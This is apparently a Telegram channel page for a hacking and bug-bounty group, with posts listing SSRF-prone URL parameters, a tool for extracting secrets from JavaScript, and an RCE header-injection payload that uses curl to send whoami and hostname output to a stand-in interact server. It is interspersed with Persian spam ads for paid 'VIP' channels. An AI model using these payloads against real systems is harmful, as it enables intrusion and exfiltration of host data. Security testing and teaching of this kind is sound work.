现已上线!2025 年 Telegram 研究 — 年度关键洞察 
BugCod3
前往频道在 Telegram
[ BugCod3 ] — From Shadows To Shells ⚡️ 🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools ⚔️ Learn • Hunt • Dominate 👥 Group: T.me/BugCod3GP 📂 Topic: T.me/BugCod3Topic 🌐 Web: BugCod3.com 🤖 Contact: T.me/BugCod3BOT 📧 Email: BugCod3@protonmail.com
显示更多7 266
订阅者
-1024 小时
+77 天
+64730 天
帖子存档
7 275
Repost from N/a
🔹 تـــــو 🔹🔤🔤🔤 🔹جـــه 🔹
♥️ به مناسبت تولدم فقط 30 دقیقه ورود به کانال VIP مون رایگانه ⬇️
❤️ https://t.me/addlist/fqAA7wPSO81kNjRk ‼️
جوین شدی تـبریک یادت نره 🙂
🍇🍇🍇🍇 @TabeVip 🍇🍇🍇🍇
دیزاین پیجت روب ما بسپار
با ابزار ادیت و ویدیو
@barcav_designer
7 275
Top 25 server-side request forgery (SSRF) parameters
Here are the top 25 parameters that could be vulnerable to server-side request forgery (SSRF) vulnerability:
?dest={target} ?redirect={target} ?uri={target} ?path={target} ?continue={target} ?url={target} ?window={target} ?next={target} ?data={target} ?reference={target} ?site={target} ?html={target} ?val={target} ?validate={target} ?domain={target} ?callback={target} ?return={target} ?page={target} ?feed={target} ?host={target} ?port={target} ?to={target} ?out={target} ?view={target} ?dir={target}Next time you encounter such parameters in an URL, get notice because SSRF is a critical vulnerability that may allow you to: ⚪️ Access services on the loopback interface of the remote server ⚪️ Scan internal network an potentially interact with internal services ⚪️ Read local files on the server using file:// protocol handler ⚪️ Move laterally / pivoting into the internal environment #SSRF #BugBounty #Tips ➖➖➖➖➖➖➖➖➖➖ 👤 T.me/BugCod3BOT 📣 T.me/BugCod3
7 275
Repost from N/a
⚠️ ۱۸ نفر دیگه!!!!
‼️ بعدش لینک باطل میشه....
https://t.me/addlist/cHMYOVjovflhYjI0
➿➿➿➿➿➿➿➿
@TabeViP هماهنگی تبادلات و تبلیغ
7 275
Repost from N/a
⚡️🆒➿🆒⭐️🆒➿🆒⚡️
هزینه ورود به این کانال ها5️⃣میلیون هست
فقط امشب میزارم تا لینک باطل نشده بیا
⬇️⬇️⬇️⬇️
https://t.me/addlist/cHMYOVjovflhYjI0
⭐️⭐️⭐️ 💜 @TabeViP 😀 ⭐️⭐️⭐️
7 275
Repost from N/a
🚨 ۱۸ نفر دیگه!!!!
❌ بعدش لینک باطل میشه....
https://t.me/addlist/kSREnIGwoMgxNmI0
🗄🗄🗄🗄🗄🗄🗄🗄🗄🗄
@TabeViP هماهنگی تبادلات و تبلیغ
7 275
Repost from N/a
⏩⏩⏩⏩💵✅💵⏩⏩⏩⏩
⚠️ فرصت رو از دست ندید ⚠️
همین حالا عضو این فولدر🔤🔤🔤بشید
تا بهترین کانال های پولی تلگرام رو یکجا داشته باشید ⬇️
https://t.me/addlist/kSREnIGwoMgxNmI0
🌟🌟🌟 🩶 @TabeViP 🩶 🌟🌟🌟
7 275
Repost from N/a
📢 [به دلیل درخواست مکرر شما برای اخرین بار لینک کانال ( VIP ) رو میذارم خواهشا دیگه کسی تو PV درخواست نکنه]
✅ اینم لینکش برای آخرین بار
https://t.me/addlist/ap-83IsL_QFmODRk
7 275
Repost from N/a
🎇🎁تـــــو 🌟🔤🔤🔤🌟جـــه🎁🎇
⚡️ به مناسبت تولد ادمین فقط 30 دقیقه ورود به کانال VIP مون رایگانه 🤩
https://t.me/addlist/ap-83IsL_QFmODRk
⬅️جوین شدی تـبریک یادت نره ❤️
📵🌟🆒 @TabeVip 🆒🌟📵
7 275
JSNinja - "Hunting Bugs in JavaScript!"
💬
JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files. It's designed for security enthusiasts,BugHunters and developers.
📊 Features:
➕ Extract URLs from JavaScript files!
➕ Identify sensitive information such as API keys and tokens!
➕ User-friendly interface!
➕Open Source and actively maintained!
🔼 Installation:
sudo apt update
sudo apt install git python3 python3-pip -y
cd JSNinja
pip3 install -r requirements.txtpython3 jsninja.py -u http://example.com/script.js --secrets --urls-u or --url: Specify a single JavaScript URL to fetch.
⚪️ --secrets: Look for sensitive information in the JavaScript content.
⚪️ --urls: Extract URLs from the JavaScript content.
⚪️ -o or --output_file: Specify the file to save extracted links (default: extracted_links.txt).
😸 Github
⬇️ Download
🔒 BugCod3
#BugBounty #JS #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 275
Repost from N/a
✅[به دلیل درخواست مکرر شما برای اخرین بار لینک کانال ( VIP ) رو میذارم خواهشا دیگه کسی تو PV درخواست نکنه]
✅ اینم لینکش برای آخرین بار👇
https://t.me/addlist/ocgRbbU5ARQ0OGQ0
7 275
Repost from N/a
🔣 تـــــو 👈🔤🔤🔤➡️ جـــه 🔣
🔹 به مناسبت تولد ادمین فقط 30 دقیقه ورود به کانال VIP مون رایگانه
https://t.me/addlist/ocgRbbU5ARQ0OGQ0
💞جوین شدی تـبریک یادت نره 💞
🆒🌟🆒 @TabeVip 🆒🌟🆒
7 275
![RCE - Can we still use this in HTTP Header? ` ' ; $ > curl${IFS}$(whoami)-$(hostname)-$(hostname${IFS}-i)[.]your-interact-ser](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/2wBDASstLTw1PHZBQXb4pYyl+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj/wAARCAAoACgDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDKbgYJH5VHgeop/wA5HWmEk0AGB6ilwPUU2igBce4opKKALG1c9B09KaVTucH0zTS5HH9aQvnqKAFIX1P6U35fU/lRlf7o/OjI/uigBtFOyP7oooACcgDjj2pclTxjn2oooAM/JjjH05po5PYUUUAJRRRQB//Z)
RCE - Can we still use this in HTTP Header?
` ' ; $ >
curl${IFS}$(whoami)-$(hostname)-$(hostname${IFS}-i)[.]your-interact-server
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 275
Hacking Articles- Cyber Security Mindmap
💬
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them
😸 Github
#Cyber #Security #Mindmap
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
7 275
Repost from N/a
✅[به دلیل درخواست مکرر شما برای اخرین بار لینک کانال ( VIP ) رو میذارم خواهشا دیگه کسی تو PV درخواست نکنه]
✅ اینم لینکش برای آخرین بار👇
https://t.me/addlist/KpVx5d10O6ZmN2Vk
7 275
Repost from N/a
🔣 تـــــو 👈🔤🔤🔤➡️ جـــه 🔣
🔺 به مناسبت تولد ادمین فقط 30 دقیقه ورود به کانال VIP مون رایگانه ⬇️
https://t.me/addlist/KpVx5d10O6ZmN2Vk
جوین شدی تـبریک یادت نره ❤️
📱🔹🔹📱 @TabeVip 📱🔹🔹📱
